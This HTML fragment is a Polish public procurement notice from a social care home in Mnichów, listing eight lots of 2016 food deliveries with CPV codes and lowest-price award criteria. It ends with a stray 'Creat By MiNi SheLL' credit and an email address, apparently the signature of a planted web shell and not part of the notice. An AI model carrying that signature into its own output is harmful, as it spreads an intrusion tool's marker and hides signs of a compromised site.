<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2015 godzina 10:00, miejsce: Dom Pomocy Społecznej w Mnichowie, Mnichów 135, 28-300 Jędrzejów, woj.świętokrzyskie, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1 - dostawy artykułów spożywczych zgodnie z formularzem cenowym stanowiącym Zał. Nr 2 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- produkty przemiału ziarna /(CPV 15610000-7/ : kasze, płatki, ryż, mąka pszenna.
- skrobia i produkty skrobiowe /CPV 15620000-0/ : mąka ziemniaczana.
- olej roślinny /CPV 154 11100-3/ : olej jadalny uniwersalny.
- oliwa z oliwek /CPV 15411110-6/ : oliwa z oliwek.
- pasztet /CPV 15131310-1/ : pasztet drobiowy.
- owoce, warzywa i podobne produkty /CPV 15300000-1/ : dżemy, powidła, warzywa 
  przetworzone, soki, owoce suszone /śliwki/, groch łuskany /połówki/, fasola /Jaś/.
- cukier i produkty pokrewne /CPV 15830000-5/ : cukier biały, cukier waniliowy, cukier
  puder, miód, syrop cukrowy.
- makaron niegotowany /CPV 15851100-9/ : makarony.
- kawa, herbata i podobne produkty /CPV 15860000-4/ : kawa zbożowa, herbata.
- przyprawy i przyprawy korzenne /CPV 15870000-7/ : sól, cynamon, czosnek
  granulowany, gałka muszkatałowa, zioła prowansalskie /mieszanka/, przyprawa warzywna do potraw, przyprawa do zup i sosów w płynie, kwasek cytrynowy, soda, ocet, ketchup,majonez, musztarda, pieprz czarny, przyprawy ziołowe.
- produkty dietetyczne /CPV 15882000-4/ : chrupki kukurydziane bezglutenowe,
  kaszki ryżowo-owocowe, kaszki mleczno-ryżowe z owocami, produkty niskobiałkowe PKU.
- różne produkty spożywcze i produkty suszone /CPV 15890000-3/ : drożdże,
  proszek do pieczenia, aromaty, bułka tarta, barszcz biały, przyprawa do zup, kostki
  rosołowe, grzyby suszone, kisiel, budyń, galaretki.
- kakao, czekolada i wyroby cukiernicze /CPV 15840000-8/ : kakao, biszkopty, wafle,
  ciastka kruche, paluszki słone, cukierki, czekolada, herbatniki i wafle w czekoladzie.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 2 /formularzu
  cenowym zadania Nr 1/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.62.00.00-0, 15.13.13.10-1, 15.83.00.00-5, 15.87.00.00-7, 15.84.00.00-8, 15.41.11.00-3, 15.61.00.00-7, 15.85.11.00-9, 15.88.20.00-4, 15.41.11.10-6, 15.30.00.00-1, 15.86.00.00-4, 15.89.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zadanie Nr 2- dostawy artykułów mleczarskich zgodnie z formularzem cenowym stanowiącym Zał. Nr 3 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- śmietana  /CPV 15512000-0/ : śmietany 18%,
- mleko w proszku /CPV 15511700-0/ : mleko w proszku,
- masło /CPV 15530000-2/ : masła świeżego,
- margaryna  /CPV 15431100-9/ : margaryny do smarowania, mixu tłuszczowego,
- jogurt bez dodatków substancji smakowych  /CPV 15551310-1/ : jogurtów
  naturalnych,
- jogurt z dodatkiem substancji smakowych /CPV 15551320-4/ : jogurtów owocowych, deserów,
- klasyfikowane produkty mleczarskie /CPV  15550000-8/ : kefiru,
- maślanka  /CPV  15551500-0/ : maślanki,
- pasty serowe do smarowania  /CPV 15545000-0/ : serków homogenizowanych
  waniliowych, serka wiejskiego i serów topionych,
- ser  twardy /CPV 15544000-3/ : sera twardego gouda i edamskiego,
- ser twarogowy  /CPV 15542100-0/ : twarogu półtłustego.  
                                                                        
  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 3 /formularzu 
  cenowym zadania Nr 2/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.51.20.00-0, 15.51.17.00-0, 15.53.00.00-2, 15.43.11.00-2, 15.55.13.10-1, 15.55.13.20-4, 15.55.00.00-8, 15.55.15.00-0, 15.54.50.00-0, 15.54.40.00-3, 15.54.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zadanie Nr 3 - dostawy pieczywa zgodnie z formularzem cenowym stanowiącym Zał. Nr 4 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą  artykułów :
- chleb  /CPV 15811100-7/ : chleba zwykłego, chleba graham, chleba słonecznikowego,  
- bułeczki /CPV 15811400-0/ : bułeczki pszenne, bułeczki graham.     

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 4 /formularzu
  cenowym zadania Nr 3/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.11.00-7, 15.81.14.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie Nr 4 - dostawy artykułów ciastkarskich i ciast zgodnie z formularzem cenowym stanowiącym Zał Nr 5 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- wyroby ciastkarskie  /CPV 15812100-4/ : bułek drożdżowych z budyniem, serem, 
   jabłkami, jagodami oraz pączków,
- ciasta /CPV 15812200-5/ : ciast drożdżowych z makiem, ciast drożdżowych z serem, strucli makowej, babki piaskowej, piernika z jabłkami.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 5 /formularzu
  cenowym zadania Nr 4/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.21.00-4, 15.81.22.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zadanie Nr 5 - dostawy mięsa i wędlin zgodnie z formularzem cenowym stanowiącym Zał. Nr 6 do SIWZ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- drób /CPV 15112000-6/ : kurczaka świeżego, filetów świeżych z kurczaka, korpusów
   mrożonych z kurczaka, udek świeżych z kurczaka,świeżego mięsa gulaszowego 
   z kurczaka
- podroby  /CPV 15114000-0/ : świeżych wątróbek i żołądków z kurczaka,
- wieprzowina /CPV 15113000-3/ : świeżej słoniny, świeżej łopatki wieprzowej bez kości, świeżego schabu bez kości, świeżej karkówki bez kości ,
- mięso wołowe  /CPV 15111000-9/ :  świeżej łopatki  wołowej bez kości,
- wędliny drobiowe /CPV 15131135-0/ : pasztetu drobiowego, parówki drobiowej 
   /cienkiej/, batonu drobiowego, polędwicy drobiowej, baleronu z indyka,
- produkty wieprzowe /CPV 15131400-9/ : kiełbasy : krakowskiej, szynkowej,
  toruńskiej, wiejskiej, zwyczajnej, pieczeni rzymskiej, pieczeni tyrolskiej, szynki wiejskiej, 
  kaszani, kiszki pasztetowej, salcesonu wiejskiego, boczku wędzonego.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 6 /formularzu
  cenowym zadania Nr 5/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.11.20.00-6, 15.11.40.00-0, 15.11.30.00-3, 15.11.10.00-9, 15.13.11.35-0, 15.13.14.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zadanie Nr 6 - dostawy artykułów rybnych zgodnie z formularzem cenowym stanowiącym Zał. Nr 7 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- ryby przetworzone i konserwowane  /CPV 15200000-0/ : filetów, płatów mrożonych 
  z : morszczuka, mintaja,  makreli wędzonej, śledzi solonych Matjas /filety/, śledzi w oleju /filety/, konserw rybnych : paprykarz szczeciński, śledź w pomidorach, filet z makreli w oleju, filet z makreli w pomidorach.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 7 /formularzu
  cenowym zadania Nr 6/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> zadanie Nr 7 - dostawy jaj zgodnie z formularzem cenowym stanowiącym Zał. Nr 8 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- jaja /CPV  03142500-3/ : jaj kurzych.

  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 8 /formularzu
  cenowym zadania Nr 7/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> zadanie Nr 8 - dostawy mrożonek zgodnie z formularzem cenowym stanowiącym Zał. Nr 9 do SIWZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy dotyczą artykułów :
- warzywa mrożone /CPV 15331100-8/ : mieszanki warzywnej, marchwi kostka, marchwi z groszkiem, kalafiora, fasolki szparagowej,
- owoce przetworzone /CPV 15332100-5/ : mieszanki kompotowej mrożonej, truskawek  mrożonych.
  Bliższe dane dotyczące przedmiotu zamówienia zawarte są w Zał. Nr 9 /formularzu
  cenowym zadania Nr 8/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.00-8, 15.33.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com